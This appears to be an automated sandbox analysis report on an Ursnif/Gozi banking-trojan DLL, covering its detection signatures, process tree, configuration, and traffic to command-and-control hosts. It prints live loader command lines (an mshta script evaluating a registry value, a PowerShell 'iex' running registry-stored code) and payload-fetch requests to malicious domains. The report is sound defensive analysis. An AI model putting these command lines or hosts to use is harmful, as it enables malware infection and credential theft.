

Analysis Report SecuriteInfo.com.BScope.TrojanBanker.IcedID.13045

Overview

General Information

Sample Name: SecuriteInfo.com.BScope.TrojanBanker.IcedID.13045 (renamed file extension from 13045 to dll)
Analysis ID: 355490
MD5: a98649743626d197b440755061b1aac3
SHA1: 8033ebd201645f713fb4ad48bf92e5da26bc8216
SHA256: f30b3f53f613d953680fdde8faf35c96a25a1136d0dd6c7aab1cc14ee908702c
Tags: Gozi

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 4220 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll' MD5: D1A7945F1810E6534B75E9E2B7D62633)
    • rundll32.exe (PID: 4880 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 3412 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 1260 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6432 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 412 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 576 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 2428 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3888 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6024 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6552 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1E30.tmp' 'c:\Users\user\AppData\Local\Temp\vy454zdn\CSCE57ED4738764ED181FB6CF8C395867D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6272 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6300 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES310C.tmp' 'c:\Users\user\AppData\Local\Temp\vkjmiujf\CSC5E84712ED974B8AAC9F3D817F74BE40.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "181", "system": "8c34453f67a8cfe0dea5c01f31a0c919hh-", "size": "202820", "crc": "2", "action": "00000000", "id": "2200", "time": "1613790327", "user": "f73be0088695dc15e71ab15cc8e7488a", "hash": "0xf751eb91", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp | GoziRule | Win32.Gozi | CCN-CERT | 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(18 entries in total; only the first five are shown)

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data:
  • Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  • CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  • CommandLine|base64offset|contains:
  • Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
  • ParentImage: C:\Windows\System32\mshta.exe
  • ParentProcessId: 2428
  • ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  • ProcessId: 3888

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://c56.lepini.at/jvassets/xI/t64.datings | Avira URL Cloud: Label: phishing
Found malware configuration
Source: rundll32.exe.4880.1.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "181", "system": "8c34453f67a8cfe0dea5c01f31a0c919hh-", "size": "202820", "crc": "2", "action": "00000000", "id": "2200", "time": "1613790327", "user": "f73be0088695dc15e71ab15cc8e7488a", "hash": "0xf751eb91", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at | Virustotal: Detection: 8%
Source: api3.lepini.at | Virustotal: Detection: 10%
Source: api10.laptok.at | Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll | Virustotal: Detection: 21%

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000020.00000002.440174527.0000025637660000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.449830180.000002835CB50000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
Source: Binary string: c:\FatSchool\syllableLetter\HuntMouth\ResultMount\Metal.pdb source: loaddll32.exe, 00000000.00000002.474041669.000000006E4F4000.00000002.00020000.sdmp, SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_032E3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_032E3512
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_06004CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,1_2_06004CF1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_06015518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_06015518
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_0600834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_0600834C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_0600B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_0600B88D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_060016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,1_2_060016E1
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: Joe Sandbox View | ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: global traffic | HTTP traffic detected: GET /api1/lRuXDeqB_2Bc/XvlsjNkb12o/gwuZFBZ1reBnRN/MwDD30RutxcHLukN9rpn9/npm0S1bymAWDLwAq/sSrh6nrcB30L_2F/izKhwPXgoMPbDw8AwI/bcxbPx_2F/sPE_2F9KStlAhqTF4V5b/y4C6N5Yt6P6BPPOxWQU/OGLJLzSobh_2B0sjZCp_2F/DrvPoP9aSd0Pf/rb0_2BEP/NEaBXrAH5a59GVRi35npZ2u/2HVSB5mOu5/GjNc1aS2g_2Friv0u/PdviQBpuxewp/654QJEVjE1l/tqM_2FQyyccPpl/OvxU5bjYeNf_2FSFZWNT_/2BXxJQTeWkl/B26Z HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/52JoIUxZl8uL8g/Jlv9SsgDyw540Wq6LwGS5/Akl7wfo7sQpZNdRY/cjXr0_2FffzKq5M/LLRxJgTq1LatxpQ4rq/e_2Fc6vld/dlUg3_2FZQ0ehGT4So8G/fMy2GT6nt6deO5e25_2/Ff0JiPPfiqmM34f5OWLQvg/KYp9KrJh0r67L/pn5QNIOf/kMWRvPMFc9r9kXODRg1ulU2/z7odHXGBMR/lYfmaULcgNQgPx4am/cS2bXQrCZF_2/B23CtBYMqES/4DTxnAolsdVLPO/ddtMaT_2FHc7z3PMSjVwg/UA6RKmWTWJJFW3tn/HIFqSc0CgE9Oz8U/RMsU3xQiPj/0lNR7s2U HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6OmN/wh_2Fqsq0x_2BVcyRu/hKNYQUf5c/2_2FFXvnTSY3WFoMID9n/_2F6Bbwi_2B4k052_2B/Wr5N3KWbYMdVd6GR_2BEd6/frQD5QyUG4NTH/KCXhDtaI/LQzs7_2BhqKT7yFro_2FbyT/VIlUFlqLO5/zPoVUlcpnwFahHZhS/NgHMqvKCx6Md/QpmRmASOulk/3KXyMSMLXtwHJ0/Ayj0bGv0dcW2jNr68db4N/OxsA4fzXWiBGnk2x/RKSr4_2F7Vbgdhx/3Qe5dCnv674qW96yc4/mbzhfuMNA/DIB HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/KdItNYP92K_2BGFJRG/FCes9fXP6/EKH8rknsTZpgqZdJldqw/3b9dm14MUM_2B8EMGSI/7pfw2RywZcbIKG9NkPZ6rU/L_2F1iZVmuA8I/bZCf7wPT/59CIAbsuvFsGBr_2ByvNsJY/_2F8CnY_2F/Qz4L32M090vQj6JXa/h6No_2BwGiDr/i_2BcbOUuIA/99cCf3a5n6QYR9/qLuOWT5N_2FpMeyoZyiR_/2BPh75eFbRwqS7wb/9mmFbiL_2BjLH_2/Bw0aMox3zZYN8BrWji/d0ul9u66b/5Ar2TaNyvuxbIv_2FbJO/iZdpEvv6dL67JT4JuHG/CIG3_2B0w/ezBI HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/vWkJGuJE0Ypz4ELElXNYpx/ievwRvWRp6AtE/FLqmCUzt/5uo9iTuyNQHW_2Bgl72Mtoc/OJjks7D84c/jUQzCvj9HAvA4_2Fn/0IgtjZWkkpM9/mugU4KqOZpX/ELHTOesIuFyu2R/fPF1D_2FKLK8pIgLUPJ8b/MsAkkR2vVU550mz4/2xNIT9yeFYP0SH8/QCAO7xgxjSKhjDwWSu/d4RDhkHVo/swuiJsofHs6pC25dK6l3/HzIzoU7jbR0_2FxK9PH/dXkkvhT3hIXDJCOq2yuAle/hm5AJy_2FYrqX/EHbCXHlP/QMEn6CeIiMAtfbE_2BItId6/8cRyHuVByX/s_2FZEQQg/t HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/Nwf1NrCXPxFirOr0/uMxCmKw0yJ8Me4y/orydykHO8XvuJC2OYB/s7Uq9EcWB/rEU1Bs_2FE38t41ILq_2/BLnFpSQmWR07RbE9l3_/2F7qFMxOvjfOZ3Wk5kh8d_/2FSq1zGohLPY7/rV1YYz1u/bg5hb76H1d9lPRJ2QkA7rOK/CzjsM_2Bpl/4Tr8l66uq_2F0z5aY/B6OoutaRjYCr/vft5NoB1Vtt/gZ1VtWrzMHi7Qd/_2FJa1O_2B51q_2Fi9e0F/9zlCZ_2Fg1KAymcn/ZnA4yi7CxnTLTPI/Xusdx3Oaio4z6sFjkd/Hl0nRXuIj/kLcz6KJ9ikRLyD1DMiLc/55hUFdugyYd/ehM HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/b_2BsRZ0V3/9XA_2FQDJiqIrvxT_/2Bzr5nCmqGSK/ShqTR3djQTg/9okoIzbrA45DgN/9_2BnAmX4aa3sOT_2Fjtg/wGfQ9GmpK7SG_2FZ/Jm_2Bu2uDtvBBiy/YdPpa1IDFr0YVFiCIU/9kpIGh2av/Hp7TJNKAwdyzbdIX2lq0/_2FLAYbWp0p17KILF16/gSpFWzNIu2P1GhKVwKLBMS/JBNwDitSRAHK2/4FJoV5D8/N70d4vmik_2BJY6NS2Abb4g/od_2FcoJz_/2BCjrYc2TYSJ6kyyC/h8EY_2Bk0tWz/YrJjDZ2_2Bq/x6uK3S6lfJQGsn/0gdeblP7aJv/qe HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/MAC288CXvx/CqE_2FjFttZgFxzTr/MiARq1YU3Ozj/cO5nvYd1QZ1/9pP5tjMqhWzKxQ/4Fo_2FlvUMfZR_2B6lME7/5rcSbRaprs2L63pj/ODg2Z6FLC7qglee/4_2Fk4pRcK6CoYb5H6/4ED5a34fC/FOE8o4kQepcFxnvsdyvs/5oUTPwL2esoyhQYMEtl/0473GEiPK1QvkIo4bwkLYq/JhStBUtEP6iki/nGPvtQkv/kuGeGooyGp9BZWCtnT06knF/ZgoZr_2F5L/6SdySCav5X7udnSBS/_2F_2B8xtq_2/BGO6I65Acz9/Ko7NuIbnR/Immw_2BnO/I HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/QsdQ9bwnxSOH1/x55zfc3o/j8BfIHUCdwyUtYZFgBqFl8X/_2BFwtf_2F/QdLOKZB9TNZsN7wvI/vobkXML_2B8c/sYZxphtC1aK/FLvOclZiXjQYOG/x5IaE7pOnih7q_2BrqmEb/egNoiSna00Kb6meB/wCzvKPOaVph51X8/xUkuRKEycofy4z_2Bl/5ilyf6ti8/f3G6tY3BMx_2BC48fFfc/OMRrOfQP_2FoyZv3x5c/mBeNmAfD4fjZh3wiudEAuV/MfCWeHQQB11zh/ND3yzaR1/SNDEufrq_2FC3x6B7XUhRUl/mw4VFuO8kI0ykyRa6MM/y41I HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 | Host: api3.lepini.at
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: unknown | HTTP traffic detected: POST /api1/7l8Dzjsp1/mXsJaM5_2F8Vehw_2BWy/W2IjJ85rxt75hrAokHG/TJ0QxGdBxL3u8DIp94_2BF/9KwvYHm_2BYSs/BfajRvyD/2MOW_2BQiedgr_2Fd8hxOAg/4ITYhYiB2o/YxcRWa76OaPgbHiid/oLaZ6rVxKHz9/_2B0DP9hiSI/LwZPk_2FktvyHp/45tIfIOgi7g5V2ypH5k4K/BaUY8Ny1I4ubY51x/HVluRDHgx9QZrYK/A8s3_2BcDuftJ4p3cS/pxjey9cHz/IRMztldXNqbinunnNW7T/V01D57bubow_2FdlHkl/Kzth8j0U_2FloaabiqRg_2/B_2Bb2W HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 | Content-Length: 2 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 19 Feb 2021 18:05:26 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: {785970B2-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr | String found in binary or memory: http://api10.laptok.at/api1/52JoIUxZl8uL8g/Jlv9SsgDyw540Wq6LwGS5/Akl7wfo7sQpZNdRY/cjXr0_2FffzKq5M/LL
Source: {785970B0-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DF4A349C0270E318E7.TMP.21.dr | String found in binary or memory: http://api10.laptok.at/api1/lRuXDeqB_2Bc/XvlsjNkb12o/gwuZFBZ1reBnRN/MwDD30RutxcHLukN9rpn9/npm0S1bymA
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6O
Source: {785970B4-7328-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DFB35D4E79E851C9A1.TMP.21.dr | String found in binary or memory: http://api10.laptok.at/api1/mJcu4ZpSHvJcxs/gTaeMeLA_2FWkDrPos3yv/o_2FkT7lhbTkz94i/fBpDzU1tcyY6OmN/wh
Source: explorer.exe, 00000024.00000002.504777682.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/vWkJGuJE0Ypz4ELElXNYpx/ievwRvWRp6AtE/FLqmCUzt/5uo9iTuyNQHW_2Bgl72Mtoc/OJ
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
